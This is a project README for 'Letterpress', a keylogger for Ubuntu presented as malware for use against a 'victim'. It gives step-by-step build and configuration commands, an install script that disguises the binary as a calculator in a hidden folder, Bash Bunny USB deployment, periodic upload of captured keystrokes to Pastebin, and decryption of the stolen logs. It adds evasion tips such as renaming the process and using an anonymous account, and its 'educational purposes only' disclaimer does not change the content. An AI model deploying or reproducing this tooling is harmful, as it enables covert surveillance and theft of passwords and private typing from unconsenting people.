A nefarious keylogger for Ubuntu.
Letterpress...
- hides in plain sight
- compiles to python bytecode for obfuscation
- encrypts keylog files so that only you can read them
- uploads keylog files to pastebin for remote exfiltration
- is easily deployable with the Bash Bunny
DISCLAIMER: Letterpress is for educational purposes only. The use of this software should not be used under circumstances where doing so is illegal. The author is not responsible for its use. Don't be a dick.
I'm hoping to make Letterpress cross-platform in the near future. If its been a couple of months since I've written this, that hasn't happened yet, and you wish to use it with another OS, bug me.
# clone the repo
git clone https://github.com/brannondorsey/letterpress.git
# navigate into the cloned directory
cd letterpress
# install the necessary dependencies
# note: this may require sudo
pip install python-xlib pycrypto PyInstaller
Letterpress must be configured before use. This is done by editing the src/config.py
file.
Letterpress uses an RSA public key to encrypt a symmetric AES cypher that is used to encrypt the keylog file that lives on the victim's computer. This protects the keylog file from being inspected at rest or in-transit from anyone but yourself (or whoever has the corresponding private RSA).
If you don't have an existing RSA keypair, you can generate one with:
ssh-keygen -t rsa -b 4096 -C "[email protected]"
In order for your public key to be used to encrypt the keylog file you must add its contents as a string to the public_key
variable inside of src/config.py
.
# edit in src/config.py
public_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDh15NNqRbPkDmyhEsyua3YXtLsXaxSH+Hwezy01GZY4aJdqSmUtCihRrMWkSD5pTbQ7UCflSSZ/09gK/yRQGlAHkSesIGtS/y2cZ7dfOFBQdGq9m1nP5vRldNq7JyicuI+pwVCb7Nkap+Zt0sb6nWi1gcJzHvyDFkhlonOG1GNxdS8BVvLe/l090nZoiNwaCtFaSxnhjOzoZEKjOe0tpucS+7AeP+AT4GIKLVLfMC0Wy8xQwSBKF22yS9z5p64eDTdOZG9c1/3dyIeyEbF5klQzF5rs31if0kiISNl+xoTBwrk0iB8Df27amzjuXEKYKbNV8MBiEOciJ7oXm5ieZHb [email protected]"
Pastebin is a popular text storage site that is often used by hackers to store, publish, or share stolen and leaked information. You must create a Pastebin account to use Letterpress, however accounts with API usage limits are free. Note that depending on your use of Letterpress you may wish to create a pastebin account using an email address that is not linked to your real name/identity.
You must provide a value for the following variables in src/config.py
like so:
pastebin_username = 'foobar'
pastebin_password = '1337'
pastebin_api_dev_key = 'deadbeef1337d99a74fbe169e3eba035'
Your unique pastebin API key can be found by clicking the API tab on pastebin.com
To minimize suspicion, Letterpress buffers keypresses and flushes them to file at an interval instead of after every keypress. Similarly, it uploads the encrypted keylog to pastebin after each set number of keypresses. The values for both of these intervals can be configured in src/config.py
.
# flush buffer to file after this many key presses
num_keypresses_between_log_updates = 100
# upload the keylog to pastebin after this man key presses
num_keypresses_between_uploads = 5000
Letterpress leverages PyInstaller to bundle all python dependencies into a compiled executable. To compile src/keylogger.py
into a standalone that can be deployed on a victim's machine, run:
./build.sh
If everything worked correctly the keylogger should have been compiled to keylogger
in the project root.
Now that you've configured and built Letterpress, the last step is to actually get it onto your victim's computer. Again, Letterpress is for educational purposes only. Do not use this on a machine you do not own without the owner's consent.
keylogger
saves encrypted keylogs in a .cache
hidden folder next to the binary. Each time it is launched it creates a new keylog file and AES key arbitrarily named .cache/XXXX
and .cache/XXXX_aes
respectively. The AES key is encrypted with the Public RSA key. This decrypted key was used to encrypt the XXXX
keylog. These files two files are uploaded to pastebin every num_keypresses_between_uploads
keypresses.
install_keylogger.sh
is a quick and easy way to install the keylogger on a victim's machine. If both files exist on a target Ubuntu machine, and sit next to one another, the following command will install and run keylogger
, hiding it plain site as /home/$USER/.linux-calculator/calc
.
# install and run the keylogger, renaming it to calc and redirecting output to /dev/null
KEYLOGGER=keylogger INSTALL_DIR=/home/$USER/.linux-calculator BIN_NAME=calc ./install_keylogger.sh
# make sure it is running
ps aux | grep calc
If you choose not to install keylogger
with install_keylogger.sh
it is advisable to rename keylogger
to something less suspicious given that it will be viewable to the victim if they inspect their running processes (via ps
, etc...).
I've included a payload.txt
script so that you can easily deploy Letterpress using a Bash Bunny.
Place your Bash Bunny in arming mode by flipping the switch so that it is closest to the USB side. You should see it pop up as a USB storage device named "BashBunny". Navigate to path/to/BashBunny/payloads/switch1
. Delete the current contents in this folder if any exist. Copy the contents of the Letterpress contents into switch1
(if you choose to instead arm to switch2
be sure to edit the SWITCH
variable in install_keylogger.sh
to reflect this).
Replace USERNAME
with the victim's username in /home/USERNAME/BashBunny/...
inside the payload.txt
that you just copied.
Flip the Bash Bunny switch from arming mode to switch1 and plug it in to a victim Ubuntu machine. Note: the vicitm's screen must not be locked. Once the Bash Bunny boots up it should:
- Open a new Terminal
- Runs
bash "/media/USER_NAME/BashBunny/payloads/switch1/install_keylogger.sh"
- Waits 5 seconds and then exits the terminal
The keylogger should now be installed and running on the vicitm machine and you can unplug the Bash Bunny.
Once your keylogger is deployed you should see periodic uploads to your pastebin as the user types on their machine. Download the encrypted keylog files XXXX
and their matching AES key XXXX_aes
and save them to disk. If pastebin automatically adds a .txt
extension remove it. You can now decrypt and view the keylog XXXX
like so:
PRIVATE_KEY=path/to/private_key ./decrypt.py XXXX
- Keep the
keylogger
process up and launch on startup with a cron job. - Edit
decrypt.py
so that it can optionally download from pastebin directly. Through something like a--download
flag. - Make cross-platform (MacOS + Windoze).
Most of the magick keylogging code comes from pyxhook.